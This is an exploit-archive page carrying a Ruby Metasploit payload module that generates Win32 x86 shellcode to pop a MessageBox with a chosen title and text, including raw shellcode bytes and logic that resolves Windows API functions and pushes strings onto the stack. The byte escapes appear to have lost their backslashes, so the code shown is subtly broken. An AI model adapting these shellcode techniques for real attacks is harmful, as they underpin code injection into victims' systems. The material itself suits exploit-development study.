[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Shellcode - Win32 MessageBox (Metasploit module)
# Published : 2010-03-24
# Author : corelanc0d3r
# Previous Title : win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
# Next Title : JITed egg-hunter stage-0 shellcode


##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##
#
#  Installation instructions :
#  Drop file in framework3/modules/payloads/singles/windows folder
#
# Usage :   ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#

require 'msf/core'
module Metasploit3

include Msf::Payload::Windows
include Msf::Payload::Single

  def initialize(info = {})
      super(update_info(info,
       'Name'          => 'Windows Messagebox with custom title and text',
       'Version'       => '$Revision: 4 $',
       'Description'   => 'Spawns MessageBox with a customizable title & text',
       'Author'        => [ 'corelanc0d3r - peter.ve[at]corelan.be', 
                                'rick2600 - ricks2600[at]gmail.com' ],
       'License'       => BSD_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X86,
       'Privileged'    => false,
       'Payload'       =>
               {
               'Offsets' => { },
               'Payload' =>    "xd9xebx9bxd9x74x24xf4x31"+
                               "xd2xb2x7ax31xc9x64x8bx71"+
                               "x30x8bx76x0cx8bx76x1cx8b"+
                               "x46x08x8bx7ex20x8bx36x38"+
                               "x4fx18x75xf3x59x01xd1xff"+
                               "xe1x60x8bx6cx24x24x8bx45"+
                               "x3cx8bx54x05x78x01xeax8b"+
                               "x4ax18x8bx5ax20x01xebxe3"+
                               "x37x49x8bx34x8bx01xeex31"+
                               "xffx31xc0xfcxacx84xc0x74"+
                               "x0axc1xcfx0dx01xc7xe9xf1"+
                               "xffxffxffx3bx7cx24x28x75"+
                               "xdex8bx5ax24x01xebx66x8b"+
                               "x0cx4bx8bx5ax1cx01xebx8b"+
                               "x04x8bx01xe8x89x44x24x1c"+
                               "x61xc3xb2x08x29xd4x89xe5"+
                               "x89xc2x68x8ex4ex0execx52"+
                               "xe8x9cxffxffxffx89x45x04"+
                               "xbb"
                        }
                        ))

                # EXITFUNC : Only support Process and Thread :/
                deregister_options('EXITFUNC')

                # Register MessageBox options
                register_options(
                     [
                      OptString.new('EXITFUNC', [ false, 
              "Only Process (default) or Thread are supported","process"]),
                      OptString.new('TITLE', [ true, 
                                   "Messagebox Title (max 255 chars)" ]),
                      OptString.new('TEXT', [ true, 
                                   "Messagebox Text" ])
                      ], self.class)
        end

    #
    # Constructs the payload
    #
   def generate
      
     strExitFunc = datastore['EXITFUNC'] || "process"
     strExitFuncHash = "x7exd8xe2x73"   #ExitProcess()

     strTitle = datastore['TITLE'] 
      if (strTitle)
  
       #ExitFunc
       if (strExitFunc) then
         strExitFunc=strExitFunc.downcase
         if strExitFunc == "thread" then
           strExitFuncHash="xEFxCExE0x60"   #ExitThread()
         end 
       end

       #================Process Title==================================
       strTitle=strTitle+"X"
       iTitle=strTitle.length
       if (iTitle < 256)
         iNrLines=iTitle/4
         iCheckChars = iNrLines * 4
         strSpaces="" 
         iSniperTitle=iTitle-1
         if iCheckChars != iTitle then
           iTargetChars=(iNrLines+1)*4
           while iTitle < iTargetChars
             strSpaces+=" "         #add space
             iTitle+=1
           end
         end
         strTitle=strTitle+strSpaces   #title is now 4 byte aligned
                                       #and string ends with X 
                                       #at index iSniperTitle

         #push Title to stack
         #start at back of string
         strPushTitle=""
         strLine=""
         icnt=strTitle.length-1
         icharcnt=0
         while icnt >= 0
           thisChar=strTitle[icnt,1]
           strLine=thisChar+strLine 
           if icharcnt < 3
            icharcnt+=1
           else
            strPushTitle=strPushTitle+"h"+strLine    #h = 68 = push
            strLine=""
            icharcnt=0
           end
           icnt=icnt-1
         end

         #generate opcode to write null byte 
         strWriteTitleNull="x31xDBx88x5Cx24"
         strWriteTitleNull += iSniperTitle.chr + "x89xe3"


         #================Process Text===============================
         #cut text into 4 byte push instructions
         strText = datastore['TEXT']
         strText=strText+"X"
         iText=strText.length
         iNrLines=iText/4
         iCheckChars = iNrLines * 4
         strSpaces=""
         iSniperText=iText-1
         if iCheckChars != iText then
           iTargetChars=(iNrLines+1)*4
           while iText < iTargetChars
               strSpaces+=" "         #add space
               iText+=1
           end
         end
         strText=strText+strSpaces   #text is now 4 byte aligned
                                     #and string ends with X
                                     #at index iSniperTitle

        #push Text to stack
        #start at back of string
        strPushText=""
        strLine=""
        icnt=strText.length-1
        icharcnt=0
        while icnt >= 0
          thisChar=strText[icnt,1]
          strLine=thisChar+strLine  
          if icharcnt < 3
             icharcnt+=1
          else
             strPushText=strPushText+"h"+strLine  #h = 68 = push
             strLine=""
             icharcnt=0
          end
          icnt=icnt-1
        end

        #generate opcode to write null byte
        strWriteTextNull="x31xc9x88x4Cx24" 
        strWriteTextNull += iSniperText.chr + "x89xe1"


        #build payload
        payload_data = module_info['Payload']['Payload']             
        payload_data += strExitFuncHash
        payload_data += "x87x1cx24" 
        payload_data += "x52xe8x8bxffxffxffx89x45"
        payload_data += "x08x68x6cx6cx20xffx68x33"
        payload_data += "x32x2ex64x68x75x73x65x72"
        payload_data += "x88x5cx24x0ax89xe6x56xff"
        payload_data += "x55x04x89xc2x50xbbxa8xa2"
        payload_data += "x4dxbcx87x1cx24x52xe8x5e"
        payload_data += "xffxffxff"
        payload_data += strPushTitle + strWriteTitleNull 
        payload_data += strPushText + strWriteTextNull
        payload_data += "x31xd2x52"
        payload_data += "x53x51x52xffxd0x31xc0x50"
        payload_data += "xffx55x08"


        return payload_data
       else
         raise ArgumentError, "Title should be 255 characters or less"
       end
     end 
   end
end